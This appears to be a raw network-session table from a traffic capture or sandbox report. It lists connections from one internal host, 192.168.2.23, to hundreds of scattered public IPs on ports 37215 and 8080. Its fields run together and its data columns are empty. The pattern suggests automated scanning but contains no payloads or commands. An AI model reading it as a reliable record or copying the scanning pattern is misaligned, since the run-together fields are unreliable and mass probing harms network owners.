                                                        15727192.168.2.2349724197.126.181.21937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15728192.168.2.2335492157.143.40.24037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15729192.168.2.2332792157.253.178.9537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15730192.168.2.2348308157.218.27.7737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15731192.168.2.2339610157.89.199.11137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15732192.168.2.2336554209.216.10.23237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15733192.168.2.233513627.254.45.17437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15734192.168.2.235290019.212.47.9337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15735192.168.2.2343184157.105.52.3937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15736192.168.2.2341418157.103.230.6337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15737192.168.2.2335988157.246.27.14637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15738192.168.2.233570061.174.22.13237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15739192.168.2.2343872197.134.13.12937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15740192.168.2.2346904140.206.216.18537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15741192.168.2.2341496162.151.242.7937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15742192.168.2.2349182157.254.166.16137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15743192.168.2.236058891.203.76.11937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15744192.168.2.235871241.207.99.22137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15745192.168.2.2338218157.172.25.3737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15746192.168.2.2336880197.168.225.18337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15747192.168.2.2351888197.171.64.22937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15748192.168.2.2355574139.74.229.19437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15749192.168.2.2346250157.145.45.737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15750192.168.2.234014641.198.199.13737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15751192.168.2.2346874157.77.134.14837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15752192.168.2.2359370157.47.52.2437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15753192.168.2.2357568157.235.174.17137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15754192.168.2.2334806197.51.126.9937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15755192.168.2.2350508207.8.161.17737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15756192.168.2.2340158197.146.22.4137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15757192.168.2.235366041.116.22.24537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15758192.168.2.2354308157.190.231.16037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15759192.168.2.234895441.149.198.10937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15760192.168.2.233729641.251.196.13037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15761192.168.2.234659641.173.195.21337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15762192.168.2.235919041.54.148.14937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15763192.168.2.2333782197.67.109.8537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15764192.168.2.234537641.93.121.4937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15765192.168.2.2335342197.116.189.17237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15766192.168.2.2358202128.216.209.7337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15767192.168.2.235466047.23.171.7337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15768192.168.2.233667641.254.253.11037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15769192.168.2.2359354118.170.176.588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15770192.168.2.2340766156.111.98.2468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15771192.168.2.233522672.170.15.1218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15772192.168.2.2344852176.49.50.768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15773192.168.2.2350826103.113.5.1008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15774192.168.2.2340708114.235.122.708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15775192.168.2.2359200212.59.207.738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15776192.168.2.2351722154.206.108.148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15777192.168.2.2346144171.73.105.718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15778192.168.2.234102857.42.75.2298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15779192.168.2.235577685.207.95.2198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15780192.168.2.2358290148.255.248.1148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15781192.168.2.2354010110.13.53.938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15782192.168.2.233619890.104.114.2168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15783192.168.2.2360932118.10.52.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15784192.168.2.2342058183.40.100.558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15785192.168.2.2352890179.27.202.2228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15786192.168.2.234160263.57.220.1888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15787192.168.2.2334684115.152.47.1268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15788192.168.2.2340408199.19.201.898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15789192.168.2.2340794140.112.117.928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15790192.168.2.235198084.102.123.828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15791192.168.2.23345845.214.6.548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15792192.168.2.2346874149.219.12.1468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15793192.168.2.2349634206.193.143.1738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15794192.168.2.235198648.191.141.2358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15795192.168.2.23521484.103.93.1588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15796192.168.2.2338416201.2.0.868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15797192.168.2.2355274187.219.233.1518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15798192.168.2.2336448218.171.120.1438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15799192.168.2.2337098191.176.61.2368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15800192.168.2.234721413.21.33.848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15801192.168.2.2360020201.162.34.1518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15802192.168.2.2348204100.32.45.178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15803192.168.2.2343060134.112.163.488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15804192.168.2.2353164190.62.37.1608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15805192.168.2.234970614.223.231.1578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15806192.168.2.2353680133.169.71.458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15807192.168.2.2333314126.74.25.2238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15808192.168.2.2351124105.8.57.1798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15809192.168.2.234051668.191.110.2158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15810192.168.2.2336532176.90.195.598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15811192.168.2.2333436173.74.17.598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15812192.168.2.234494066.38.129.908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15813192.168.2.235069288.22.64.648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15814192.168.2.2356514106.255.251.1578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15815192.168.2.2358110128.182.59.1588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15816192.168.2.234524671.135.120.688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15817192.168.2.2347982129.128.171.1038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15818192.168.2.2350716108.10.25.1698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15819192.168.2.2341290119.221.157.958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15820192.168.2.2356936172.147.174.868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15821192.168.2.23382244.219.6.1428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15822192.168.2.234553488.15.252.78080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15823192.168.2.2353358197.211.1.2248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15824192.168.2.233577660.92.192.1388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15825192.168.2.2339722109.45.164.618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15826192.168.2.235599043.56.86.38080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15827192.168.2.2333326110.132.97.2358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15828192.168.2.2352318211.119.158.108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15829192.168.2.2342796179.34.30.478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15830192.168.2.235832634.70.220.1318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15831192.168.2.2351996111.190.127.1518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15832192.168.2.235972493.148.25.2118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15833192.168.2.233345612.50.93.2358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15834192.168.2.2352404128.194.49.1188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15835192.168.2.2353432184.189.145.1618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15836192.168.2.2335116134.222.169.2498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15837192.168.2.2351180145.64.215.2298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15838192.168.2.233379883.245.226.738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15839192.168.2.235330874.171.69.938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15840192.168.2.234412483.60.186.78080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15841192.168.2.2357888161.129.22.1218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15842192.168.2.235508445.98.229.1998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15843192.168.2.2346536115.137.26.988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15844192.168.2.235826274.108.76.248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15845192.168.2.2333640187.7.189.648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15846192.168.2.2340682210.34.209.2318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15847192.168.2.2346742119.209.212.1458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15848192.168.2.234460494.99.86.1418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15849192.168.2.2353982125.169.79.2098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15850192.168.2.233545889.140.172.1978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15851192.168.2.2344932114.220.93.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15852192.168.2.235055679.10.58.378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15853192.168.2.2358050151.198.192.98080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15854192.168.2.235583290.199.103.2518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15855192.168.2.233282817.223.58.908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15856192.168.2.234788625.201.115.1778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15857192.168.2.234685440.59.142.1548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15858192.168.2.2359412150.94.121.738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15859192.168.2.234882487.193.94.1848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15860192.168.2.2351340143.97.216.968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15861192.168.2.2344116136.159.217.188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15862192.168.2.2347068112.93.27.1418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15863192.168.2.2357150108.114.79.878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15864192.168.2.235035094.109.8.1668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15865192.168.2.234925273.57.118.1338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15866192.168.2.234867235.191.247.38080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15867192.168.2.2358982133.68.78.2448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15868192.168.2.234950294.24.198.758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15869192.168.2.235923064.188.221.2308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15870192.168.2.2347240132.163.44.1268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15871192.168.2.2335840206.93.211.548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15872192.168.2.2336854175.119.44.1378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15873192.168.2.2359042146.63.151.488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15874192.168.2.233954099.255.172.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15875192.168.2.2349748133.141.15.1898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15876192.168.2.2347430212.254.88.638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15877192.168.2.233364269.242.194.1158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15878192.168.2.234941682.159.200.1548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15879192.168.2.234453694.77.249.988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15880192.168.2.234904240.72.26.1308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15881192.168.2.2339664174.96.102.2548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15882192.168.2.2350572110.214.97.418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15883192.168.2.235459661.8.86.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15884192.168.2.234916012.231.95.288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15885192.168.2.2356176166.210.183.1628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15886192.168.2.23553224.71.5.1448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15887192.168.2.2337258135.222.141.298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15888192.168.2.235155060.133.43.678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15889192.168.2.2344746184.177.221.2178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15890192.168.2.2333932150.173.215.2478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15891192.168.2.234458434.174.57.2068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15892192.168.2.2359382221.186.91.1708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15893192.168.2.23539941.237.138.428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15894192.168.2.235914896.171.240.1528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15895192.168.2.2347012206.144.84.1448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15896192.168.2.233545843.39.102.1188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15897192.168.2.2355990196.56.90.2198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15898192.168.2.2347888201.179.178.2168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15899192.168.2.233716657.117.108.2428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15900192.168.2.233948248.150.207.1708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15901192.168.2.2347838184.103.179.2148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15902192.168.2.234433288.93.72.1988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15903192.168.2.2357358119.224.56.2448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15904192.168.2.235860227.54.235.678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15905192.168.2.2334248158.206.123.1838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15906192.168.2.2360884135.103.50.28080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15907192.168.2.2337396174.203.147.1068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15908192.168.2.233839420.213.40.438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15909192.168.2.234887038.171.59.508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15910192.168.2.2346442162.24.99.2448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15911192.168.2.234352684.247.178.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15912192.168.2.236000449.121.32.1278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15913192.168.2.235452048.75.189.2278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15914192.168.2.2340256125.196.211.348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15915192.168.2.235159099.239.159.668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15916192.168.2.234197027.29.193.1528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15917192.168.2.2357908143.193.225.1658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15918192.168.2.2360656149.66.209.268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15919192.168.2.2352692128.134.108.278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15920192.168.2.2350028119.99.162.1768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15921192.168.2.2349458191.3.108.598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15922192.168.2.2337318194.210.76.418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15923192.168.2.2340620112.191.228.938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15924192.168.2.2337130142.225.149.978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15925192.168.2.2349724123.233.142.1848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15926192.168.2.2349198219.127.13.2518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15927192.168.2.23483465.52.173.508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15928192.168.2.2338322196.100.186.688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15929192.168.2.2357394158.135.54.188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15930192.168.2.235075087.198.237.1038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15931192.168.2.235479097.217.147.1548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15932192.168.2.235160085.238.165.1068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15933192.168.2.2339886221.165.134.1388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15934192.168.2.234430880.35.221.2148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15935192.168.2.2360570107.172.169.2338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15936192.168.2.235937692.166.172.988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15937192.168.2.2359776194.47.3.108080
